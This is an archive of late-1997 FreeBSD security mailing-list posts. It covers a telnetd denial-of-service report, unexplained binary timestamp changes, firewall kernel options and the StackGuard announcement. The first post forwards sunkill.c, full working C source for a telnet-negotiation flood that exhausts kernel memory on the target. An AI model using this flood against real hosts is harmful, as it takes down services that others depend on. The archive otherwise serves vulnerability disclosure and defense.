From owner-freebsd-security Sun Dec 14 22:52:57 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.7/8.8.7) id WAA27423 for security-outgoing; Sun, 14 Dec 1997 22:52:57 -0800 (PST) (envelope-from owner-freebsd-security) Received: from shell6.ba.best.com (jkb@shell6.ba.best.com [206.184.139.137]) by hub.freebsd.org (8.8.7/8.8.7) with ESMTP id WAA27418 for ; Sun, 14 Dec 1997 22:52:54 -0800 (PST) (envelope-from jkb@best.com) Received: from localhost (jkb@localhost) by shell6.ba.best.com (8.8.8/8.8.BEST) with SMTP id WAA03193 for ; Sun, 14 Dec 1997 22:52:53 -0800 (PST) X-Authentication-Warning: shell6.ba.best.com: jkb owned process doing -bs Date: Sun, 14 Dec 1997 22:52:52 -0800 (PST) From: Jan Koum X-Sender: jkb@shell6.ba.best.com To: freebsd-security@freebsd.org Subject: To kill a sun: (fwd) Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Hi all, I tried this against my 2.2.5-RELEASE machine which is on the ethernet with another FreeBSD (3.0-CURRENT) machine. The 2.2.5 one usually doing nothing but running an rc5-64 client (Go team FreeBSD Japan!). Here is what top showed: last pid: 20938; load averages: 2.04, 1.65, 1.30 22:42:21 16 processes: 3 running, 13 sleeping CPU states: 81.5% user, 0.0% nice, 5.0% system, 13.5% interrupt, 0.0% idle Mem: 13M Active, 1152K Inact, 7564K Wired, 7624K Cache, 3606K Buf, 1896K Free Swap: 128M Total, 96K Used, 128M Free PID USERNAME PRI NICE SIZE RES STATE TIME WCPU CPU COMMAND 3616 jkb 53 -20 824K 316K RUN 222.7H 68.89% 68.89% rc564 20923 root 63 0 192K 616K RUN 1:21 27.35% 27.35% telnetd ^^^^^^^^^^^^^ 16129 root 2 0 492K 720K select 15:33 1.45% 1.45% ppp 20932 jkb 29 0 600K 796K RUN 0:01 0.04% 0.04% top 134 root 18 0 332K 416K pause 0:46 0.00% 0.00% cron 171 jkb 18 4 452K 284K pause 0:00 0.00% 0.00% csh Usually the load is at 1.00 since I have rc564 running with priority of -20. But this time it was 2.xx -- I guess telnetd doubled it this time. Running this against 3.0-CURRENT (from a week ago or so) wasn't as horrible and showed this: last pid: 4861; load averages: 0.18, 0.65, 0.48 22:45:12 39 processes: 2 running, 37 sleeping CPU states: 23.3% user, 0.0% nice, 3.9% system, 1.6% interrupt, 71.2% idle Mem: 19M Active, 21M Inact, 11M Wired, 9384K Cache, 4942K Buf, 828K Free Swap: 256M Total, 84M Used, 172M Free, 33% Inuse PID USERNAME PRI NICE SIZE RES STATE TIME WCPU CPU COMMAND 2894 jkb 2 0 40228K 14716K RUN 121:26 7.21% 7.21% netscape 2867 jkb 2 0 19156K 15788K select 37:14 4.46% 4.46% Xaccel 4855 root 2 0 204K 432K sbwait 0:00 2.22% 1.83% telnetd ^^^^^^^^^^^^ 4858 jkb 28 0 820K 636K RUN 0:00 0.82% 0.61% top 2868 jkb 2 0 436K 456K select 0:23 0.15% 0.15% afterstep 3165 jkb 2 0 708K 344K select 0:01 0.08% 0.08% ssh Does that mean that 2.2.5 is vulnerable to a little DoS? I am comparing it to 3.0 which handles it with a lot of grace. -- Yan ---------- Forwarded message ---------- Date: Sat, 13 Dec 1997 15:48:51 -0500 From: Jason Zapman II To: BUGTRAQ@NETSPACE.ORG Subject: To kill a sun: This is sunkill.c It Affects at least solaris 2.5.1 machines, both sun4c and sun4m achitecutures. I imagine it affects all solaris 2.5.1 machines, both sparc and x86, but im not sure. It basically works by opening a telnet connection on the victim machine and sends a few bad telnet negotiation options, then flooods the port with lots of ^D characters. This uses all the streams memory (i think) on the victims machine and causes the kernel to get very angry. The machien crawls to a halt, the cursor in X stops moving, the machine is unresponsive to the network. Its a bad situation all around. /* ** To make, if your system is BSD'ish: gcc ** ...if your system is SysV'ish: gcc -lnsl -lsocket ** ** Usage: a.out ** ** Have fun! */ #include #include #include #include #include #include #include #include #define BUFSIZE 100 #define DOTS void catchit(void) { printf("\nCaught SIGPIPE -- your link may be too slow.\n"); exit(1); } int main(int argc, char *argv[]) { unsigned char kludge_telopt[] = {IAC,WONT,TELOPT_TTYPE,IAC,DO, \ TELOPT_SGA,IAC,WONT,TELOPT_XDISPLOC,IAC,WONT,TELOPT_NAWS,IAC,WONT, \ TELOPT_OLD_ENVIRON,IAC,WONT,TELOPT_NEW_ENVIRON,IAC,DO,TELOPT_ECHO}; unsigned char nastybuf[BUFSIZE]; struct sockaddr_in sin; struct servent *sp; struct hostent *hp; int s; typedef void (*sig_t) (int); signal(SIGPIPE,(sig_t)catchit); memset(nastybuf,4,BUFSIZE); /* ascii 4 = ^D */ if (!(s = socket(AF_INET, SOCK_STREAM, 0))) { printf("no socket\n"); exit(1); } if (!(hp = gethostbyname(argv[1]))) { printf("unknown host\n"); exit(1); } bzero(&sin,sizeof(sin)); bcopy(hp->h_addr,(char *)&sin.sin_addr,hp->h_length); sin.sin_family = AF_INET; sp = getservbyname("telnet","tcp"); sin.sin_port = sp->s_port; if (connect(s,(struct sockaddr *)&sin,sizeof(sin)) == -1) { printf("can't connect to host\n"); exit(1); } printf("connected to %s\n",argv[1]); write(s,kludge_telopt,21); /* kludge some telnet negotiation */ /* "Let them eat ^Ds..." */ while (write(s,nastybuf,BUFSIZE) != -1) { #ifdef DOTS write(STDOUT_FILENO,".",1); #endif } } Jason -- Jason Price | If you want to build a ship, don't drum up people Theta Xi, | together to collect wood and don't assign them tasks Beta, Alpha 449 | and work, but rather teach them to long for the endless jprice@poboxes.com | immensity of the sea. -- Antoine de Saint Exupery From owner-freebsd-security Mon Dec 15 10:06:12 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.7/8.8.7) id KAA19790 for security-outgoing; Mon, 15 Dec 1997 10:06:12 -0800 (PST) (envelope-from owner-freebsd-security) Received: (from root@localhost) by hub.freebsd.org (8.8.7/8.8.7) id KAA19237 for security@freebsd.org; Mon, 15 Dec 1997 10:02:41 -0800 (PST) (envelope-from owner-bugmaster@freebsd.org) Date: Mon, 15 Dec 1997 10:02:41 -0800 (PST) Message-Id: <199712151802.KAA19237@hub.freebsd.org> From: FreeBSD bugmaster To: security Subject: Current problem reports assigned to you Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk Current FreeBSD problem reports Critical problems Serious problems S Submitted Tracker Resp. Description ------------------------------------------------------------------------------- o [1997/11/20] kern/5103 security-officerIt appears to be possible to lockup a Fre 1 problem total. Non-critical problems From owner-freebsd-security Tue Dec 16 16:51:25 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.7/8.8.7) id QAA16915 for security-outgoing; Tue, 16 Dec 1997 16:51:25 -0800 (PST) (envelope-from owner-freebsd-security) Received: from ohio.river.org (river.org [209.24.233.15]) by hub.freebsd.org (8.8.7/8.8.7) with ESMTP id QAA16910 for ; Tue, 16 Dec 1997 16:51:20 -0800 (PST) (envelope-from dhawk@ohio.river.org) Received: (from dhawk@localhost) by ohio.river.org (8.8.8/8.7.3) id QAA14100 for freebsd-security@freebsd.org; Tue, 16 Dec 1997 16:51:08 -0800 (PST) From: David Hawkins Message-Id: <199712170051.QAA14100@ohio.river.org> Subject: Is this something to worry about? To: freebsd-security@freebsd.org Date: Tue, 16 Dec 1997 16:51:08 -0800 (PST) X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Background: today I did a make and install in /usr/ports/x11/XFree86 and XFree86-contrib and I thought I hadn't touched /usr/bin but noticed this later in the day: -r-xr-xr-x 1 bin bin 123 Dec 6 07:02 linux -r-xr-xr-x 1 bin bin 122 Dec 6 07:02 qcam -r-xr-xr-x 1 bin bin 16384 Dec 16 05:00 tail -r-xr-xr-x 1 bin bin 126976 Dec 16 10:55 awk -r-xr-xr-x 1 bin bin 12288 Dec 16 11:35 du That the last three files there were modified today. I'm not aware of anything on the system that would have modified 'tail' at 5am. Going to go by that Make book right now so I can figure some of this out on my own. ;-) Thanks for any feedback, though. later, david -- David Hawkins -- dhawk@river.org http://www.river.org If you take the small view, the universe is just something small and round, like those water-filled balls which produce a miniature snowstorm when you shake them. Although, unless the ineffable plan is a lot more ineffable than it's given credit for, it does not have a large plastic snowman at the bottom. -- (Terry Pratchett & Neil Gaiman, Good Omens) From owner-freebsd-security Tue Dec 16 18:28:38 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.7/8.8.7) id SAA26260 for security-outgoing; Tue, 16 Dec 1997 18:28:38 -0800 (PST) (envelope-from owner-freebsd-security) Received: from word.smith.net.au (vh1.gsoft.com.au [203.38.152.122]) by hub.freebsd.org (8.8.7/8.8.7) with ESMTP id SAA26253 for ; Tue, 16 Dec 1997 18:28:31 -0800 (PST) (envelope-from mike@word.smith.net.au) Received: from word (localhost [127.0.0.1]) by word.smith.net.au (8.8.8/8.8.5) with ESMTP id MAA01090; Wed, 17 Dec 1997 12:52:43 +1030 (CST) Message-Id: <199712170222.MAA01090@word.smith.net.au> X-Mailer: exmh version 2.0zeta 7/24/97 To: David Hawkins cc: freebsd-security@freebsd.org Subject: Re: Is this something to worry about? In-reply-to: Your message of "Tue, 16 Dec 1997 16:51:08 -0800." <199712170051.QAA14100@ohio.river.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Wed, 17 Dec 1997 12:52:42 +1030 From: Mike Smith Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > Background: today I did a make and install in /usr/ports/x11/XFree86 > and XFree86-contrib and I thought I hadn't touched /usr/bin > but noticed this later in the day: > > -r-xr-xr-x 1 bin bin 123 Dec 6 07:02 linux > -r-xr-xr-x 1 bin bin 122 Dec 6 07:02 qcam > -r-xr-xr-x 1 bin bin 16384 Dec 16 05:00 tail > -r-xr-xr-x 1 bin bin 126976 Dec 16 10:55 awk > -r-xr-xr-x 1 bin bin 12288 Dec 16 11:35 du > > That the last three files there were modified today. I'm not aware of > anything on the system that would have modified 'tail' at 5am. This is a "feature" of the system; occasionally executables appear to be written to while they're running. Nobody has been able to work out why; the write doesn't appear to change any of the actual contents of the file. mike From owner-freebsd-security Tue Dec 16 18:45:40 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.7/8.8.7) id SAA27267 for security-outgoing; Tue, 16 Dec 1997 18:45:40 -0800 (PST) (envelope-from owner-freebsd-security) Received: from cheops.anu.edu.au (avalon@cheops.anu.edu.au [150.203.76.24]) by hub.freebsd.org (8.8.7/8.8.7) with ESMTP id SAA27242 for ; Tue, 16 Dec 1997 18:45:34 -0800 (PST) (envelope-from avalon@coombs.anu.edu.au) Message-Id: <199712170245.SAA27242@hub.freebsd.org> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA262326616; Wed, 17 Dec 1997 13:43:36 +1100 From: Darren Reed Subject: Re: Is this something to worry about? To: dhawk@river.org (David Hawkins) Date: Wed, 17 Dec 1997 13:43:36 +1100 (EDT) Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <199712170051.QAA14100@ohio.river.org> from "David Hawkins" at Dec 16, 97 04:51:08 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk In some mail from David Hawkins, sie said: > > Background: today I did a make and install in /usr/ports/x11/XFree86 > and XFree86-contrib and I thought I hadn't touched /usr/bin > but noticed this later in the day: > > -r-xr-xr-x 1 bin bin 123 Dec 6 07:02 linux > -r-xr-xr-x 1 bin bin 122 Dec 6 07:02 qcam > -r-xr-xr-x 1 bin bin 16384 Dec 16 05:00 tail > -r-xr-xr-x 1 bin bin 126976 Dec 16 10:55 awk > -r-xr-xr-x 1 bin bin 12288 Dec 16 11:35 du > > That the last three files there were modified today. I'm not aware of > anything on the system that would have modified 'tail' at 5am. You haven't used something like "file(1)" on them or some other program that changes the inode using utimes, have you ? From owner-freebsd-security Tue Dec 16 19:38:53 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.7/8.8.7) id TAA02251 for security-outgoing; Tue, 16 Dec 1997 19:38:53 -0800 (PST) (envelope-from owner-freebsd-security) Received: from dyson.iquest.net (dyson.iquest.net [198.70.144.127]) by hub.freebsd.org (8.8.7/8.8.7) with ESMTP id TAA02246 for ; Tue, 16 Dec 1997 19:38:50 -0800 (PST) (envelope-from toor@dyson.iquest.net) Received: (from root@localhost) by dyson.iquest.net (8.8.8/8.8.8) id WAA01537; Tue, 16 Dec 1997 22:38:17 -0500 (EST) (envelope-from toor) From: "John S. Dyson" Message-Id: <199712170338.WAA01537@dyson.iquest.net> Subject: Re: Is this something to worry about? In-Reply-To: <199712170222.MAA01090@word.smith.net.au> from Mike Smith at "Dec 17, 97 12:52:42 pm" To: mike@smith.net.au (Mike Smith) Date: Tue, 16 Dec 1997 22:38:16 -0500 (EST) Cc: dhawk@river.org, freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL31 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk Mike Smith said: > > Background: today I did a make and install in /usr/ports/x11/XFree86 > > and XFree86-contrib and I thought I hadn't touched /usr/bin > > but noticed this later in the day: > > > > -r-xr-xr-x 1 bin bin 123 Dec 6 07:02 linux > > -r-xr-xr-x 1 bin bin 122 Dec 6 07:02 qcam > > -r-xr-xr-x 1 bin bin 16384 Dec 16 05:00 tail > > -r-xr-xr-x 1 bin bin 126976 Dec 16 10:55 awk > > -r-xr-xr-x 1 bin bin 12288 Dec 16 11:35 du > > > > That the last three files there were modified today. I'm not aware of > > anything on the system that would have modified 'tail' at 5am. > > This is a "feature" of the system; occasionally executables appear to > be written to while they're running. Nobody has been able to work out > why; the write doesn't appear to change any of the actual contents of > the file. > I think that it has been fixed in the 3.0 line of code. Let me know if there is ANY of this happening on -current! -- John | Never try to teach a pig to sing, dyson@freebsd.org | it just makes you look stupid, and jdyson@nc.com | it irritates the pig. From owner-freebsd-security Wed Dec 17 07:40:30 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.7/8.8.7) id HAA19064 for security-outgoing; Wed, 17 Dec 1997 07:40:30 -0800 (PST) (envelope-from owner-freebsd-security) Received: from mbox.tu-graz.ac.at (mbox.tu-graz.ac.at [129.27.2.6]) by hub.freebsd.org (8.8.7/8.8.7) with SMTP id HAA19049 for ; Wed, 17 Dec 1997 07:40:24 -0800 (PST) (envelope-from dada@localhost.tu-graz.ac.at) Received: from fcggsg07.icg.tu-graz.ac.at by mbox.tu-graz.ac.at with SMTP id AA05651 (5.67c/IDA-1.5t for ); Wed, 17 Dec 1997 16:40:39 +0100 Received: from localhost.tu-graz.ac.at (isdn095.tu-graz.ac.at [129.27.240.95]) by fcggsg07.icg.tu-graz.ac.at (8.8.8/8.8.8) with ESMTP id QAA07664; Wed, 17 Dec 1997 16:39:39 +0100 (MET) Received: from localhost (localhost.tu-graz.ac.at [127.0.0.1]) by localhost.tu-graz.ac.at (8.8.5/8.8.5) with SMTP id IAA02240; Wed, 17 Dec 1997 08:05:02 +0100 (CET) Date: Wed, 17 Dec 1997 08:05:02 +0100 (CET) From: Martin Kammerhofer Reply-To: Martin Kammerhofer To: David Hawkins Cc: freebsd-security@FreeBSD.ORG Subject: Re: Is this something to worry about? In-Reply-To: <199712170222.MAA01090@word.smith.net.au> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Wed, 17 Dec 1997, Mike Smith wrote: > > > > That the last three files there were modified today. I'm not aware of > > anything on the system that would have modified 'tail' at 5am. > > This is a "feature" of the system; occasionally executables appear to > be written to while they're running. Nobody has been able to work out > why; the write doesn't appear to change any of the actual contents of > the file. > > mike > And it breaks things like tripwire ;-I From owner-freebsd-security Wed Dec 17 09:56:25 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.7/8.8.7) id JAA27997 for security-outgoing; Wed, 17 Dec 1997 09:56:25 -0800 (PST) (envelope-from owner-freebsd-security) Received: from ymris.ddm.on.ca (cisco7-152.cas.golden.net [207.216.76.152]) by hub.freebsd.org (8.8.7/8.8.7) with ESMTP id JAA27989 for ; Wed, 17 Dec 1997 09:56:17 -0800 (PST) (envelope-from dchapes@ddm.on.ca) Received: from squigy.ddm.on.ca (squigy.ddm.on.ca [209.47.139.138]) by ymris.ddm.on.ca (8.8.7/8.8.8) with ESMTP id MAA04254 for ; Wed, 17 Dec 1997 12:55:41 -0500 (EST) (envelope-from dchapes@ymris.ddm.on.ca) Received: (from dchapes@localhost) by squigy.ddm.on.ca (8.8.7/8.8.7) id MAA17520; Wed, 17 Dec 1997 12:55:40 -0500 (EST) Message-ID: <19971217125540.06561@ddm.on.ca> Date: Wed, 17 Dec 1997 12:55:40 -0500 From: Dave Chapeskie To: freebsd-security@FreeBSD.ORG Subject: Re: Is this something to worry about? References: <199712170222.MAA01090@word.smith.net.au> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.81 In-Reply-To: ; from Martin Kammerhofer on Wed, Dec 17, 1997 at 08:05:02AM +0100 Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Wed, 17 Dec 1997, Mike Smith wrote: > This is a "feature" of the system; occasionally executables appear to > be written to while they're running. Nobody has been able to work out > why; the write doesn't appear to change any of the actual contents of > the file. On Wed, Dec 17, 1997 at 08:05:02AM +0100, Martin Kammerhofer wrote: > And it breaks things like tripwire ;-I Things like tripwire should be looking at the md5, not the timestamp. The same thing goes for the stuff in /etc/security that uses an ugly find | xargs ls | sort pipe to get a list of suid timestamps. This is silly and usless when they should be using mtree(8) with the "md5digest" keyword. -- Dave Chapeskie, DDM Consulting E-Mail: dchapes@ddm.on.ca From owner-freebsd-security Thu Dec 18 08:17:38 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.7/8.8.7) id IAA29125 for security-outgoing; Thu, 18 Dec 1997 08:17:38 -0800 (PST) (envelope-from owner-freebsd-security) Received: from homeport.org (lighthouse.homeport.org [205.136.65.198]) by hub.freebsd.org (8.8.7/8.8.7) with ESMTP id IAA29110 for ; Thu, 18 Dec 1997 08:17:31 -0800 (PST) (envelope-from adam@homeport.org) Received: (adam@localhost) by homeport.org (8.8.5/8.6.9) id LAA14478; Thu, 18 Dec 1997 11:15:03 -0500 (EST) From: Adam Shostack Message-Id: <199712181615.LAA14478@homeport.org> Subject: Kernel options for FW? To: firewall-wizards@nfr.net (Firewall Wizards List), freebsd-security@FreeBSD.ORG Date: Thu, 18 Dec 1997 11:15:02 -0500 (EST) X-Mailer: ELM [version 2.4ME+ PL27 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk (This is not meant to spark a religious war. I'm asking for help configuring a kernel, and comparing kernel security features between FreeBSD and NetBSD to make a reasonable decision.) On Netbsd, I'd enable the following options. I can't find equivilents to these on FreeBSD. Do they exist, and what are they? Also, I know Freebsd sets kernel security wrong (-1) by default, and that needs to be fixed. Are there other things that I should know about on Freebsd to do everything right? options IPFORWSRCRT=0 //Turn off source routing. options IPNOPRIVPORTS //Remove concept of priv'd ports so BIND doesn't //need to run as root. options IPFILTER_DEFAULT_BLOCK //Put my FW policy in the kernel. options FDSCRIPTS // Allow a script to be run if it is x only, by // passing a file descriptor to the interpreter, // avoiding some race conditions. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From owner-freebsd-security Thu Dec 18 09:33:35 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.7/8.8.7) id JAA05800 for security-outgoing; Thu, 18 Dec 1997 09:33:35 -0800 (PST) (envelope-from owner-freebsd-security) Received: from Kitten.mcs.com (Kitten.mcs.com [192.160.127.90]) by hub.freebsd.org (8.8.7/8.8.7) with ESMTP id JAA05793 for ; Thu, 18 Dec 1997 09:33:33 -0800 (PST) (envelope-from nash@Jupiter.Mcs.Net) Received: from Jupiter.Mcs.Net (nash@Jupiter.mcs.net [192.160.127.88]) by Kitten.mcs.com (8.8.7/8.8.2) with ESMTP id LAA11863; Thu, 18 Dec 1997 11:33:32 -0600 (CST) Received: from localhost (nash@localhost) by Jupiter.Mcs.Net (8.8.7/8.8.2) with SMTP id LAA04388; Thu, 18 Dec 1997 11:33:31 -0600 (CST) Date: Thu, 18 Dec 1997 11:33:31 -0600 (CST) From: Alex Nash To: Adam Shostack cc: Firewall Wizards List , freebsd-security@FreeBSD.ORG Subject: Re: Kernel options for FW? In-Reply-To: <199712181615.LAA14478@homeport.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Thu, 18 Dec 1997, Adam Shostack wrote: > options IPFORWSRCRT=0 //Turn off source routing. This is the default. It is controllable via sysctl. > options IPNOPRIVPORTS //Remove concept of priv'd ports so BIND doesn't > //need to run as root. I don't know if there's a good way of doing this, but you could hack IPPORT_RESERVED in in.h (unfortunately this isn't surrounded by an ifndef, so you can't just thrown options IPPORT_RESERVED into your kernel config). > options IPFILTER_DEFAULT_BLOCK //Put my FW policy in the kernel. This is the default for FreeBSD's ipfw. Alex From owner-freebsd-security Fri Dec 19 02:53:11 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.7/8.8.7) id CAA10856 for security-outgoing; Fri, 19 Dec 1997 02:53:11 -0800 (PST) (envelope-from owner-freebsd-security) Received: from firewall.ftf.dk (root@mail.ftf.dk [129.142.64.2]) by hub.freebsd.org (8.8.7/8.8.7) with ESMTP id CAA10850 for ; Fri, 19 Dec 1997 02:53:06 -0800 (PST) (envelope-from regnauld@deepo.prosa.dk) Received: from mail.prosa.dk ([192.168.100.2]) by firewall.ftf.dk (8.7.6/8.7.3) with ESMTP id NAA09665 for ; Fri, 19 Dec 1997 13:32:18 +0100 Received: from deepo.prosa.dk (deepo.prosa.dk [192.168.100.10]) by mail.prosa.dk (8.8.5/8.8.5/prosa-1.1) with ESMTP id MAA04463 for ; Fri, 19 Dec 1997 12:20:02 +0100 (CET) Received: (from regnauld@localhost) by deepo.prosa.dk (8.8.7/8.8.5/prosa-1.1) id LAA08705; Fri, 19 Dec 1997 11:52:02 +0100 (CET) Message-ID: <19971219115202.29626@deepo.prosa.dk> Date: Fri, 19 Dec 1997 11:52:02 +0100 From: Philippe Regnauld To: freebsd-security@freebsd.org Subject: Fwd: "StackGuard: Automatic Protection From Stack-smashing Attacks" Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.88e X-Operating-System: FreeBSD 2.2.5-RELEASE i386 Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Anybody ever used this ? Potential overhead ? -----Forwarded message from Crispin Cowan ----- Date: Thu, 18 Dec 1997 21:34:39 -0800 From: Crispin Cowan Subject: StackGuard: Automatic Protection From Stack-smashing Attacks To: BUGTRAQ@NETSPACE.ORG StackGuard: Automatic Detection and Prevention of Buffer-Overflow Attacks StackGuard provides a systematic solution to the persistent problem of buffer overflow attacks. Buffer overflow attacks gained notoriety in 1988 as art of the Morris Worm incident on the Internet. While it is fairly simple to fix individual buffer overflow vulnerabilities, buffer overflow attacks continue to this day. Hundreds of attacks have been discovered, and while most of the obvious vulnerabilities have now been patched, more sophisticated buffer overflow attacks continue to emerge. StackGuard is a simple compiler technique that virtually eliminates buffer overflow vulnerabilities with only modest performance penalties. Privileged programs that are recompiled with the StackGuard compiler extension no longer yield control to the attacker, but rather enter fail-safe state. These programs require no source code changes at all, and are binary-compatible with existing operating systems and libraries. StackGuard is intended to protect buggy software against stack smashing attacks, even those attacks that have not yet been discovered. For instance, even though StackGuard was developed prior to the public announcement Samba stack smashing vulnerability, the same vulnerable Samba code when compiled with StackGuard protection was not vulnerable to the attack. A paper describing StackGuard will appear in the 1998 USENIX Security Conference. A pre-print of the paper is available (postscript and HTML) here: http://www.cse.ogi.edu/DISC/projects/immunix/StackGuard/ Source for the StackGuard-enhanced gcc is also here. This software is available under the usual GPL (GNU Public License) rules. Security people are invited to download and evaluate StackGuard. StackGuard may be of particular interest to system administrators seeking to protect their hosts from attack. The compiler is very stable; for instance, a StackGuard-enhanced gcc can compile itself correctly. Programs compiled with StackGuard should both compile and link without complaint. However, since this is a first release of StackGuard, I still recommend that privileged software be kept up to date with respect to security announcements. I am very interested in feedback on StackGuard. Naturally, all the usual feedback is requested (bugs, security vulnerabilities, comments on the design, etc.). Of *particular* interest is any alarms that StackGuard sets off: if someone attempts to apply a stack-smashing attack to a StackGuard-protected program, the program will halt with an error message instead of yielding a root shell. This message *may* indicate the discovery of a new stack-smashing vulnerability: please report it both to me. If your version of the program is current, then you may also wish to report the problem to the author of the program in question. I wish to thank the many contributors to the BUGTRAQ mailing list. The background information provided by BUGTRAQ was invaluable to this research. I am aware that there are other stack smashing solutions, and they are described and cited in the paper. Crispin ----- Crispin Cowan, Research Assistant Professor of Computer Science Oregon Graduate Institute | Electronically: Department of Computer Science | analog: 503-690-1265 PO Box 91000 | digital: crispin@cse.ogi.edu Portland, OR 97291-1000 | URL: http://www.cse.ogi.edu/~crispin/ Knowledge is to Wisdom as Data is to Code -----End of forwarded message----- -- -[ Philippe Regnauld / sysadmin / regnauld@deepo.prosa.dk / +55.4N +11.3E ]- "Pluto placed his bad dog at the entrance of Hades to keep the dead IN and the living OUT! The archetypical corporate firewall?" - S. Kelly Bootle, about Cerberus ["MYTHOLOGY", in Marutukku distrib] - From owner-freebsd-security Fri Dec 19 07:38:52 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.7/8.8.7) id HAA24248 for security-outgoing; Fri, 19 Dec 1997 07:38:52 -0800 (PST) (envelope-from owner-freebsd-security) Received: from passer.osg.gov.bc.ca (passer.osg.gov.bc.ca [142.32.110.29]) by hub.freebsd.org (8.8.7/8.8.7) with ESMTP id HAA24240 for ; Fri, 19 Dec 1997 07:38:49 -0800 (PST) (envelope-from cy@cschuber.net.gov.bc.ca) Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.8.8/8.6.10) id HAA19837; Fri, 19 Dec 1997 07:38:42 -0800 (PST) Received: from cschuber.net.gov.bc.ca(142.31.240.113), claiming to be "cwsys.cwsent.com" via SMTP by passer.osg.gov.bc.ca, id smtpdaaEnaa; Fri Dec 19 07:38:36 1997 Received: (from uucp@localhost) by cwsys.cwsent.com (8.8.8/8.6.10) id HAA00996; Fri, 19 Dec 1997 07:38:18 -0800 (PST) Message-Id: <199712191538.HAA00996@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpd000987; Fri Dec 19 15:38:00 1997 X-Mailer: exmh version 2.0zeta 7/24/97 Reply-to: Cy Schubert - ITSD Open Systems Group From: Cy Schubert - ITSD Open Systems Group X-Sender: cy To: Adam Shostack cc: firewall-wizards@nfr.net (Firewall Wizards List), freebsd-security@freebsd.org Subject: Re: Kernel options for FW? In-reply-to: Your message of "Thu, 18 Dec 1997 11:15:02 EST." <199712181615.LAA14478@homeport.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Fri, 19 Dec 1997 07:37:59 -0800 Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > (This is not meant to spark a religious war. I'm asking for help > configuring a kernel, and comparing kernel security features between > FreeBSD and NetBSD to make a reasonable decision.) > > On Netbsd, I'd enable the following options. I can't find equivilents > to these on FreeBSD. Do they exist, and what are they? Also, I know > Freebsd sets kernel security wrong (-1) by default, and that needs to > be fixed. Are there other things that I should know about on Freebsd > to do everything right? > > > options IPFORWSRCRT=0 //Turn off source routing. Under FreeBSD you would use, ipfw deny ... ipoptions ssrr ipfw deny ... ipoptions lsrr ipfw deny ... ipoptions rr > > options IPNOPRIVPORTS //Remove concept of priv'd ports so BIND doesn't > //need to run as root. There is no equivalent in FreeBSD-stable. I'm not sure whether -current has it. > > options IPFILTER_DEFAULT_BLOCK //Put my FW policy in the kernel. The FreeBSD default is BLOCK and is defined as rule 65535. If you wish to make the default PASS, then you'd define rule 65534 with the pass option. > > options FDSCRIPTS // Allow a script to be run if it is x only, by > // passing a file descriptor to the interpreter, > // avoiding some race conditions. I'm not sure that I understand, but I'll attempt to answer it anyway. Using divert sockets you can divert packets to an arbitrary piece of code, e.g. NAT. To set up a divert socket you would use the divert option of ipfw. > > Adam > > -- > "It is seldom that liberty of any kind is lost all at once." > -Hume > > > Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 UNIX Support OV/VM: BCSC02(CSCHUBER) ITSD BITNET: CSCHUBER@BCSC02.BITNET Government of BC Internet: cschuber@uumail.gov.bc.ca Cy.Schubert@gems8.gov.bc.ca "Quit spooling around, JES do it." From owner-freebsd-security Fri Dec 19 16:14:57 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.7/8.8.7) id QAA04514 for security-outgoing; Fri, 19 Dec 1997 16:14:57 -0800 (PST) (envelope-from owner-freebsd-security) Received: from freebsd.coffeehaus.net (qmailr@freebsd.coffeehaus.net [146.115.119.6]) by hub.freebsd.org (8.8.7/8.8.7) with SMTP id QAA04498 for ; Fri, 19 Dec 1997 16:14:53 -0800 (PST) 